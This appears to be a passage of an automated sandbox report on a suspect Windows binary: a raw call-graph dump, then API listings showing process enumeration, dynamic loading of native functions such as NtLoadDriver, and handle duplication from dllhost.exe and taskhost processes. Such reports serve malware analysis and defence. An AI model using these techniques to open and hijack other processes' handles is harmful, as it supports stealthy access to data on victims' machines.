40401->40257 40402->40261 40403->40265 40404->40271 40405->40278 40406->40287 40407->40302 40408->40309 40409->40327 40410->40327 40411->40327 40412->40323 40413->40330 40414->40336 40415->40307 40416->40307 40417->40307 40418->40305 40419->40313 40420->40316 40421->40319 40422->40324 40423->40328 40424->40332 40425->40335 40426->40342 40427->40343 40428->40342 40429->40346 40430->40348 40431->40350 40432->40352 40433->40354 40434->40356 40435->40358 40436->40360 40437->40362 40438->40364 40439->40366 40440->40310 40441->40283 40442->40293 40443->40272 40444->40276 40445->40282 40446->40289 40447->40268 40448->40266 40449->40273 40450->40274 40451->40285 40452->40288 40453->40295 40454->40289 40455->40298 40456->40300 40457->40310 40458->40251 40459->40197 40461 42a175 40460->40461 40463 42a122 40460->40463 40461->40378 40466 42b13b 147 API calls 40461->40466 40463->40461 40464 42a115 147 API calls 40463->40464 40467 43a174 40463->40467 40491 42a0a8 147 API calls 40463->40491 40464->40463 40466->40376 40481 43a196 40467->40481 40482 43a19e 40467->40482 40468 43a306 40468->40481 40504 4388c4 14 API calls 40468->40504 40471 42a115 147 API calls 40471->40482 40472 415a91 memset 40472->40482 40473 43a642 40473->40481 40508 4169a7 11 API calls 40473->40508 40475 4165ff 11 API calls 40475->40482 40477 43a635 40507 42c02e memset 40477->40507 40481->40463 40482->40468 40482->40471 40482->40472 40482->40475 40482->40481 40492 42ff8c 40482->40492 40500 439504 13 API calls 40482->40500 40501 4312d0 147 API calls 40482->40501 40502 42be4c memcpy memcpy memcpy memset memcpy 40482->40502 40503 43a121 11 API calls 40482->40503 40484 4169a7 11 API calls 40485 43a325 40484->40485 40485->40473 40485->40477 40485->40481 40485->40484 40486 42b5b5 memset memcpy 40485->40486 40487 42bf4c 14 API calls 40485->40487 40490 4165ff 11 API calls 40485->40490 40505 42b63e 14 API calls 40485->40505 40506 42bfcf memcpy 40485->40506 40486->40485 40487->40485 40490->40485 40491->40463 40493 43817e 139 API calls 40492->40493 40494 42ff99 40493->40494 40495 42ffe3 40494->40495 40496 42ffd0 40494->40496 40499 42ff9d 40494->40499 40510 4169a7 11 API calls 40495->40510 40509 4169a7 11 API calls 40496->40509 40499->40482 40500->40482 40501->40482 40502->40482 40503->40482 40504->40485 40505->40485 40506->40485 40507->40473 40508->40481 40509->40499 40510->40499 40532 41493c EnumResourceNamesW 37540 4287c1 37541 4287d2 37540->37541 37542 429ac1 37540->37542 37543 428818 37541->37543 37544 42881f 37541->37544 37558 425711 37541->37558 37557 425ad6 37542->37557 37610 415c56 11 API calls 37542->37610 37577 42013a 37543->37577 37605 420244 97 API calls 37544->37605 37548 4260dd 37604 424251 120 API calls 37548->37604 37551 4259da 37603 416760 11 API calls 37551->37603 37556 429a4d 37560 429a66 37556->37560 37561 429a9b 37556->37561 37558->37542 37558->37551 37558->37556 37559 422aeb memset memcpy memcpy 37558->37559 37563 4260a1 37558->37563 37573 4259c2 37558->37573 37576 425a38 37558->37576 37593 4227f0 memset memcpy 37558->37593 37594 422b84 15 API calls 37558->37594 37595 422b5d memset memcpy memcpy 37558->37595 37596 422640 13 API calls 37558->37596 37598 4241fc 11 API calls 37558->37598 37599 42413a 90 API calls 37558->37599 37559->37558 37606 415c56 11 API calls 37560->37606 37565 429a96 37561->37565 37608 416760 11 API calls 37561->37608 37602 415c56 11 API calls 37563->37602 37609 424251 120 API calls 37565->37609 37568 429a7a 37607 416760 11 API calls 37568->37607 37573->37557 37597 415c56 11 API calls 37573->37597 37576->37573 37600 422640 13 API calls 37576->37600 37601 4226e0 12 API calls 37576->37601 37578 42014c 37577->37578 37581 420151 37577->37581 37620 41e466 97 API calls 37578->37620 37580 420162 37580->37558 37581->37580 37582 4201b3 37581->37582 37583 420229 37581->37583 37584 4201b8 37582->37584 37585 4201dc 37582->37585 37583->37580 37586 41fd5e 86 API calls 37583->37586 37611 41fbdb 37584->37611 37585->37580 37589 4201ff 37585->37589 37617 41fc4c 37585->37617 37586->37580 37589->37580 37592 42013a 97 API calls 37589->37592 37592->37580 37593->37558 37594->37558 37595->37558 37596->37558 37597->37551 37598->37558 37599->37558 37600->37576 37601->37576 37602->37551 37603->37548 37604->37557 37605->37558 37606->37568 37607->37565 37608->37565 37609->37542 37610->37551 37612 41fbf8 37611->37612 37615 41fbf1 37611->37615 37625 41ee26 37612->37625 37616 41fc39 37615->37616 37635 4446ce 11 API calls 37615->37635 37616->37580 37621 41fd5e 37616->37621 37618 41ee6b 86 API calls 37617->37618 37619 41fc5d 37618->37619 37619->37585 37620->37581 37623 41fd65 37621->37623 37622 41fdab 37622->37580 37623->37622 37624 41fbdb 86 API calls 37623->37624 37624->37623 37626 41ee41 37625->37626 37627 41ee32 37625->37627 37636 41edad 37626->37636 37639 4446ce 11 API calls 37627->37639 37630 41ee3c 37630->37615 37633 41ee58 37633->37630 37641 41ee6b 37633->37641 37635->37616 37645 41be52 37636->37645 37639->37630 37640 41eb85 11 API calls 37640->37633 37642 41ee70 37641->37642 37643 41ee78 37641->37643 37698 41bf99 86 API calls 37642->37698 37643->37630 37646 41be6f 37645->37646 37647 41be5f 37645->37647 37653 41be8c 37646->37653 37677 418c63 memset memset 37646->37677 37676 4446ce 11 API calls 37647->37676 37650 41bee7 37651 41be69 37650->37651 37681 41a453 86 API calls 37650->37681 37651->37630 37651->37640 37653->37650 37653->37651 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37680 4446ce 11 API calls 37654->37680 37657 41bef0 37655->37657 37660 41bee2 37655->37660 37657->37650 37658 41bf01 37657->37658 37659 41bf24 memset 37658->37659 37664 41bf14 37658->37664 37678 418a6d memset memcpy memset 37658->37678 37659->37651 37666 41ac13 37660->37666 37679 41a223 memset memcpy memset 37664->37679 37665 41bf20 37665->37659 37667 41ac52 37666->37667 37668 41ac3f memset 37666->37668 37670 41ac6a 37667->37670 37682 41dc14 19 API calls 37667->37682 37673 41acd9 37668->37673 37672 41aca1 37670->37672 37683 41519d 37670->37683 37672->37673 37674 41acc0 memset 37672->37674 37675 41accd memcpy 37672->37675 37673->37650 37674->37673 37675->37673 37676->37651 37677->37653 37678->37664 37679->37665 37680->37650 37682->37670 37686 4175ed 37683->37686 37694 417570 SetFilePointer 37686->37694 37689 41760a ReadFile 37690 417637 37689->37690 37691 417627 GetLastError 37689->37691 37692 41763e memset 37690->37692 37693 4151b3 37690->37693 37691->37693 37692->37693 37693->37672 37695 4175b2 37694->37695 37696 41759c GetLastError 37694->37696 37695->37689 37695->37693 37696->37695 37697 4175a8 GetLastError 37696->37697 37697->37695 37698->37643 37699 417bc5 37700 417c61 37699->37700 37701 417bda 37699->37701 37701->37700 37702 417bf6 UnmapViewOfFile CloseHandle 37701->37702 37704 417c2c 37701->37704 37706 4175b7 37701->37706 37702->37701 37702->37702 37704->37701 37711 41851e 20 API calls 37704->37711 37707 4175d6 FindCloseChangeNotification 37706->37707 37708 4175c8 37707->37708 37709 4175df 37707->37709 37708->37709 37710 4175ce Sleep 37708->37710 37709->37701 37710->37707 37711->37704 37718 4415ea 37726 4304b2 37718->37726 37720 4415fe 37721 4418ea 37720->37721 37722 442bd4 37720->37722 37723 4418e2 37720->37723 37722->37721 37774 441409 memset 37722->37774 37723->37721 37773 4414a9 12 API calls 37723->37773 37775 43041c 12 API calls 37726->37775 37728 4304cd 37733 430557 37728->37733 37776 43034a memcpy 37728->37776 37730 4304f3 37730->37733 37777 430468 11 API calls 37730->37777 37732 430506 37732->37733 37734 43057b 37732->37734 37778 43817e 37732->37778 37733->37720 37783 415a91 37734->37783 37739 4305e4 37739->37733 37788 4328e4 12 API calls 37739->37788 37741 43052d 37741->37733 37741->37734 37744 430542 37741->37744 37743 4305fa 37745 430609 37743->37745 37789 423383 11 API calls 37743->37789 37744->37733 37782 4169a7 11 API calls 37744->37782 37790 423330 11 API calls 37745->37790 37748 430634 37791 423399 11 API calls 37748->37791 37750 430648 37792 4233ae 11 API calls 37750->37792 37752 43066b 37793 423330 11 API calls 37752->37793 37754 43067d 37794 4233ae 11 API calls 37754->37794 37756 430695 37795 423330 11 API calls 37756->37795 37758 4306d6 37797 423330 11 API calls 37758->37797 37759 4306a7 37759->37758 37760 4306c0 37759->37760 37796 4233ae 11 API calls 37760->37796 37763 4306d1 37798 430369 17 API calls 37763->37798 37765 4306f3 37799 423330 11 API calls 37765->37799 37767 430704 37800 423330 11 API calls 37767->37800 37769 430710 37801 423330 11 API calls 37769->37801 37771 43071e 37802 423383 11 API calls 37771->37802 37773->37721 37774->37722 37775->37728 37776->37730 37777->37732 37779 438187 37778->37779 37781 438192 37778->37781 37803 4380f6 37779->37803 37781->37741 37782->37733 37784 415a9d 37783->37784 37785 415ab3 37784->37785 37786 415aa4 memset 37784->37786 37785->37733 37787 4397fd memset 37785->37787 37786->37785 37787->37739 37788->37743 37789->37745 37790->37748 37791->37750 37792->37752 37793->37754 37794->37756 37795->37759 37796->37763 37797->37763 37798->37765 37799->37767 37800->37769 37801->37771 37802->37733 37805 43811f 37803->37805 37804 438164 37804->37781 37805->37804 37808 437e5e 37805->37808 37831 4300e8 memset memset memcpy 37805->37831 37832 437d3c 37808->37832 37810 437eb3 37810->37805 37811 437ea9 37811->37810 37816 437f22 37811->37816 37847 41f432 37811->37847 37814 437f06 37897 415c56 11 API calls 37814->37897 37818 437f7f 37816->37818 37898 432d4e 37816->37898 37817 437f95 37902 415c56 11 API calls 37817->37902 37818->37817 37820 43802b 37818->37820 37858 4165ff 37820->37858 37822 437fa3 37822->37810 37905 41f638 104 API calls 37822->37905 37827 43806b 37829 438094 37827->37829 37903 42f50e 138 API calls 37827->37903 37829->37822 37904 4300e8 memset memset memcpy 37829->37904 37831->37805 37833 437d69 37832->37833 37836 437d80 37832->37836 37918 437ccb 11 API calls 37833->37918 37835 437d76 37835->37811 37836->37835 37837 437da3 37836->37837 37838 437d90 37836->37838 37906 438460 37837->37906 37838->37835 37922 437ccb 11 API calls 37838->37922 37841 437de8 37921 424f26 123 API calls 37841->37921 37843 437dcb 37843->37841 37919 444283 13 API calls 37843->37919 37845 437dfc 37920 437ccb 11 API calls 37845->37920 37848 41f54d 37847->37848 37852 41f44f 37847->37852 37849 41f466 37848->37849 38093 41c635 memset memset 37848->38093 37849->37814 37849->37816 37852->37849 37856 41f50b 37852->37856 38064 41f1a5 37852->38064 38089 41c06f memcmp 37852->38089 38090 41f3b1 90 API calls 37852->38090 38091 41f398 86 API calls 37852->38091 37856->37848 37856->37849 38092 41c295 86 API calls 37856->38092 37859 4165a0 11 API calls 37858->37859 37860 41660d 37859->37860 37861 437371 37860->37861 37862 41703f 11 API calls 37861->37862 37863 437399 37862->37863 37864 43739d 37863->37864 37866 4373ac 37863->37866 38202 4446ea 11 API calls 37864->38202 37867 416935 16 API calls 37866->37867 37883 4373ca 37867->37883 37868 437584 37870 4375bc 37868->37870 38209 42453e 123 API calls 37868->38209 37869 438460 134 API calls 37869->37883 37872 415c7d 16 API calls 37870->37872 37873 4375d2 37872->37873 37877 4373a7 37873->37877 38210 4442e6 37873->38210 37876 4375e2 37876->37877 38217 444283 13 API calls 37876->38217 37877->37827 37879 415a91 memset 37879->37883 37882 43758f 38208 42453e 123 API calls 37882->38208 37883->37868 37883->37869 37883->37879 37883->37882 37896 437d3c 135 API calls 37883->37896 38184 4251c4 37883->38184 38203 425433 13 API calls 37883->38203 38204 425413 17 API calls 37883->38204 38205 42533e 16 API calls 37883->38205 38206 42538f 16 API calls 37883->38206 38207 42453e 123 API calls 37883->38207 37886 4375f4 37890 437620 37886->37890 37891 43760b 37886->37891 37888 43759f 37889 416935 16 API calls 37888->37889 37889->37868 37892 416935 16 API calls 37890->37892 38218 444283 13 API calls 37891->38218 37892->37877 37895 437612 memcpy 37895->37877 37896->37883 37897->37810 37899 432d65 37898->37899 37900 432d58 37898->37900 37899->37818 38293 432cc4 memset memset memcpy 37900->38293 37902->37822 37903->37829 37904->37822 37905->37810 37923 41703f 37906->37923 37908 43847a 37909 43848a 37908->37909 37910 43847e 37908->37910 37930 438270 37909->37930 37960 4446ea 11 API calls 37910->37960 37914 438488 37914->37843 37916 4384bb 37917 438270 134 API calls 37916->37917 37917->37914 37918->37835 37919->37845 37920->37841 37921->37835 37922->37835 37924 417044 37923->37924 37925 41705c 37923->37925 37929 417055 37924->37929 37962 416760 11 API calls 37924->37962 37926 417075 37925->37926 37963 41707a 11 API calls 37925->37963 37926->37908 37929->37908 37931 415a91 memset 37930->37931 37932 43828d 37931->37932 37933 438297 37932->37933 37934 438341 37932->37934 37936 4382d6 37932->37936 37935 415c7d 16 API calls 37933->37935 37964 44358f 37934->37964 37938 438458 37935->37938 37939 4382fb 37936->37939 37940 4382db 37936->37940 37938->37914 37961 424f26 123 API calls 37938->37961 38007 415c23 memcpy 37939->38007 37995 416935 37940->37995 37943 438305 37947 44358f 19 API calls 37943->37947 37949 438318 37943->37949 37944 4382e9 38003 415c7d 37944->38003 37946 438373 37952 438383 37946->37952 38008 4300e8 memset memset memcpy 37946->38008 37947->37949 37949->37946 37990 43819e 37949->37990 37951 4383cd 37953 4383f5 37951->37953 38010 42453e 123 API calls 37951->38010 37952->37951 38009 415c23 memcpy 37952->38009 37956 438404 37953->37956 37957 43841c 37953->37957 37959 416935 16 API calls 37956->37959 37958 416935 16 API calls 37957->37958 37958->37933 37959->37933 37960->37914 37961->37916 37962->37929 37963->37924 37965 4435be 37964->37965 37966 44360c 37965->37966 37968 443676 37965->37968 37971 4436ce 37965->37971 37975 44366c 37965->37975 38011 442ff8 37965->38011 37966->37949 37967 443758 37980 443775 37967->37980 38020 441409 memset 37967->38020 37968->37967 37970 443737 37968->37970 37972 442ff8 19 API calls 37968->37972 37973 442ff8 19 API calls 37970->37973 37977 4165ff 11 API calls 37971->37977 37972->37970 37973->37967 38019 4169a7 11 API calls 37975->38019 37976 4437be 37981 4437de 37976->37981 38022 416760 11 API calls 37976->38022 37977->37968 37980->37976 38021 415c56 11 API calls 37980->38021 37984 443801 37981->37984 38023 42463b memset memcpy 37981->38023 37983 443826 38025 43bd08 memset 37983->38025 37984->37983 38024 43024d memset 37984->38024 37988 443837 37988->37966 38026 43024d memset 37988->38026 37991 438246 37990->37991 37993 4381ba 37990->37993 37991->37946 37992 41f432 110 API calls 37992->37993 37993->37991 37993->37992 38042 41f638 104 API calls 37993->38042 37996 41693e 37995->37996 37999 41698e 37995->37999 37997 41694c 37996->37997 38043 422fd1 memset 37996->38043 37997->37999 38044 4165a0 37997->38044 37999->37944 38004 415c81 38003->38004 38005 415c9c 38003->38005 38004->38005 38006 416935 16 API calls 38004->38006 38005->37933 38006->38005 38007->37943 38008->37952 38009->37951 38010->37953 38012 442ffe 38011->38012 38013 443094 38012->38013 38016 443092 38012->38016 38027 4414ff 38012->38027 38039 4169a7 11 API calls 38012->38039 38040 441325 memset 38012->38040 38041 4414a9 12 API calls 38013->38041 38016->37965 38019->37968 38020->37967 38021->37976 38022->37981 38023->37984 38024->37983 38025->37988 38026->37988 38028 441539 38027->38028 38029 441547 38027->38029 38028->38029 38030 441575 38028->38030 38031 441582 38028->38031 38032 4418e2 38029->38032 38038 442bd4 38029->38038 38034 42fccf 18 API calls 38030->38034 38033 43275a 12 API calls 38031->38033 38035 4414a9 12 API calls 38032->38035 38036 4418ea 38032->38036 38033->38029 38034->38029 38035->38036 38036->38012 38037 441409 memset 38037->38038 38038->38036 38038->38037 38039->38012 38040->38012 38041->38016 38042->37993 38043->37997 38050 415cfe 38044->38050 38049 422b84 15 API calls 38049->37999 38051 41628e 38050->38051 38056 415d23 __aullrem __aulldvrm 38050->38056 38058 416520 38051->38058 38052 4163ca 38053 416422 10 API calls 38052->38053 38053->38051 38054 416172 memset 38054->38056 38055 416422 10 API calls 38055->38056 38056->38051 38056->38052 38056->38054 38056->38055 38057 415cb9 10 API calls 38056->38057 38057->38056 38059 416527 38058->38059 38063 416574 38058->38063 38060 415700 10 API calls 38059->38060 38061 416544 38059->38061 38059->38063 38060->38061 38062 416561 memcpy 38061->38062 38061->38063 38062->38063 38063->37999 38063->38049 38094 41bc3b 38064->38094 38067 41edad 86 API calls 38068 41f1cb 38067->38068 38069 41f1f5 memcmp 38068->38069 38070 41f20e 38068->38070 38074 41f282 38068->38074 38069->38070 38071 41f21b memcmp 38070->38071 38070->38074 38072 41f326 38071->38072 38075 41f23d 38071->38075 38073 41ee6b 86 API calls 38072->38073 38072->38074 38073->38074 38074->37852 38075->38072 38076 41f28e memcmp 38075->38076 38118 41c8df 56 API calls 38075->38118 38076->38072 38077 41f2a9 38076->38077 38077->38072 38080 41f308 38077->38080 38081 41f2d8 38077->38081 38079 41f269 38079->38072 38082 41f287 38079->38082 38083 41f27a 38079->38083 38080->38072 38123 4446ce 11 API calls 38080->38123 38084 41ee6b 86 API calls 38081->38084 38082->38076 38085 41ee6b 86 API calls 38083->38085 38086 41f2e0 38084->38086 38085->38074 38119 41b1ca 38086->38119 38089->37852 38090->37852 38091->37852 38092->37848 38093->37849 38096 41bc54 38094->38096 38103 41be0b 38094->38103 38097 41bd61 38096->38097 38096->38103 38107 41bc8d 38096->38107 38124 41baf0 55 API calls 38096->38124 38099 41be45 38097->38099 38133 41a25f memset 38097->38133 38099->38067 38099->38074 38101 41be04 38131 41aee4 56 API calls 38101->38131 38103->38097 38132 41ae17 34 API calls 38103->38132 38104 41bd42 38104->38097 38104->38101 38105 41bdd8 memset 38104->38105 38106 41bdba 38104->38106 38108 41bde7 memcmp 38105->38108 38117 4175ed 6 API calls 38106->38117 38107->38097 38107->38104 38109 41bd18 38107->38109 38125 4151e3 38107->38125 38108->38101 38111 41bdfd 38108->38111 38109->38097 38109->38104 38129 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38109->38129 38110 41bdcc 38110->38097 38110->38108 38130 41a1b0 memset 38111->38130 38117->38110 38118->38079 38120 41b1e4 38119->38120 38122 41b243 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38120->38122 38183 41a1b0 memset 38120->38183 38122->38074 38123->38072 38124->38107 38134 41837f 38125->38134 38128 444706 11 API calls 38128->38109 38129->38104 38130->38101 38131->38103 38132->38097 38133->38099 38135 4183c1 38134->38135 38138 4183ca 38134->38138 38181 418197 25 API calls 38135->38181 38139 4151f9 38138->38139 38155 418160 38138->38155 38139->38109 38139->38128 38140 4183e5 38140->38139 38164 41739b 38140->38164 38143 418444 CreateFileW 38145 418477 38143->38145 38144 41845f CreateFileA 38144->38145 38146 4184c2 memset 38145->38146 38147 41847e GetLastError ??3@YAXPAX 38145->38147 38167 418758 38146->38167 38148 4184b5 38147->38148 38149 418497 38147->38149 38182 444706 11 API calls 38148->38182 38151 41837f 49 API calls 38149->38151 38151->38139 38156 41739b GetVersionExW 38155->38156 38157 418165 38156->38157 38159 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38157->38159 38160 418178 38159->38160 38161 41817f 38160->38161 38162 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38160->38162 38161->38140 38163 418188 ??3@YAXPAX 38162->38163 38163->38140 38165 4173d6 38164->38165 38166 4173ad GetVersionExW 38164->38166 38165->38143 38165->38144 38166->38165 38168 418680 43 API calls 38167->38168 38169 418782 38168->38169 38170 418160 11 API calls 38169->38170 38172 418506 ??3@YAXPAX 38169->38172 38171 418799 38170->38171 38171->38172 38173 41739b GetVersionExW 38171->38173 38172->38139 38174 4187a7 38173->38174 38175 4187da 38174->38175 38176 4187ad GetDiskFreeSpaceW 38174->38176 38178 4187ec GetDiskFreeSpaceA 38175->38178 38180 4187e8 38175->38180 38179 418800 ??3@YAXPAX 38176->38179 38178->38179 38179->38172 38180->38178 38181->38138 38182->38139 38183->38122 38219 424f07 38184->38219 38186 4251e4 38187 4251f7 38186->38187 38188 4251e8 38186->38188 38227 4250f8 38187->38227 38226 4446ea 11 API calls 38188->38226 38190 4251f2 38190->37883 38192 425209 38195 425249 38192->38195 38198 4250f8 127 API calls 38192->38198 38199 425287 38192->38199 38235 4384e9 135 API calls 38192->38235 38236 424f74 124 API calls 38192->38236 38193 415c7d 16 API calls 38193->38190 38195->38199 38237 424ff0 13 API calls 38195->38237 38198->38192 38199->38193 38200 425266 38200->38199 38238 415be9 memcpy 38200->38238 38202->37877 38203->37883 38204->37883 38205->37883 38206->37883 38207->37883 38208->37888 38209->37870 38211 4442eb 38210->38211 38214 444303 38210->38214 38291 41707a 11 API calls 38211->38291 38213 4442f2 38213->38214 38292 4446ea 11 API calls 38213->38292 38214->37876 38216 444300 38216->37876 38217->37886 38218->37895 38220 424f1f 38219->38220 38221 424f0c 38219->38221 38240 424eea 11 API calls 38220->38240 38239 416760 11 API calls 38221->38239 38224 424f18 38224->38186 38225 424f24 38225->38186 38226->38190 38228 425108 38227->38228 38234 42510d 38227->38234 38273 424f74 124 API calls 38228->38273 38231 42516e 38233 415c7d 16 API calls 38231->38233 38232 425115 38232->38192 38233->38232 38234->38232 38241 42569b 38234->38241 38235->38192 38236->38192 38237->38200 38238->38199 38239->38224 38240->38225 38252 4256f1 38241->38252 38269 4259c2 38241->38269 38242 429ac1 38268 425ad6 38242->38268 38290 415c56 11 API calls 38242->38290 38247 4260dd 38285 424251 120 API calls 38247->38285 38251 429a4d 38254 429a66 38251->38254 38255 429a9b 38251->38255 38252->38242 38252->38251 38253 422aeb memset memcpy memcpy 38252->38253 38257 4260a1 38252->38257 38266 4259da 38252->38266 38252->38269 38272 425a38 38252->38272 38274 4227f0 memset memcpy 38252->38274 38275 422b84 15 API calls 38252->38275 38276 422b5d memset memcpy memcpy 38252->38276 38277 422640 13 API calls 38252->38277 38279 4241fc 11 API calls 38252->38279 38280 42413a 90 API calls 38252->38280 38253->38252 38286 415c56 11 API calls 38254->38286 38259 429a96 38255->38259 38288 416760 11 API calls 38255->38288 38283 415c56 11 API calls 38257->38283 38289 424251 120 API calls 38259->38289 38262 429a7a 38287 416760 11 API calls 38262->38287 38284 416760 11 API calls 38266->38284 38268->38231 38269->38268 38278 415c56 11 API calls 38269->38278 38272->38269 38281 422640 13 API calls 38272->38281 38282 4226e0 12 API calls 38272->38282 38273->38234 38274->38252 38275->38252 38276->38252 38277->38252 38278->38266 38279->38252 38280->38252 38281->38272 38282->38272 38283->38266 38284->38247 38285->38268 38286->38262 38287->38259 38288->38259 38289->38242 38290->38266 38291->38213 38292->38216 38293->37899 40171 4147f3 40174 414561 40171->40174 40173 414813 40175 41456d 40174->40175 40176 41457f GetPrivateProfileIntW 40174->40176 40179 4143f1 memset _itow WritePrivateProfileStringW 40175->40179 40176->40173 40178 41457a 40178->40173 40179->40178

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 360 40de6e-40de71 359->360 360->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 377 40dffd-40e006 372->377 373->363 373->377 375 40df08 374->375 376 40dfef-40dff2 CloseHandle 374->376 378 40df0b-40df10 375->378 376->373 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->376 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040DDAD
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                            • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                            • memset.MSVCRT ref: 0040DF5F
                                                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                            • API String ID: 594330280-3398334509
                                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 ??3@YAXPAX@Z 643->646 648 413edb-413ee2 645->648 646->648 652 413ee4 648->652 653 413ee7-413efe 648->653 662 413ea2-413eae CloseHandle 650->662 656 413e61-413e68 651->656 657 413e37-413e44 GetModuleHandleW 651->657 652->653 653->638 656->650 659 413e6a-413e76 656->659 657->656 658 413e46-413e5c GetProcAddress 657->658 658->656 659->650 662->641
                                                                                            APIs
                                                                                              • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                            • memset.MSVCRT ref: 00413D7F
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                            • memset.MSVCRT ref: 00413E07
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
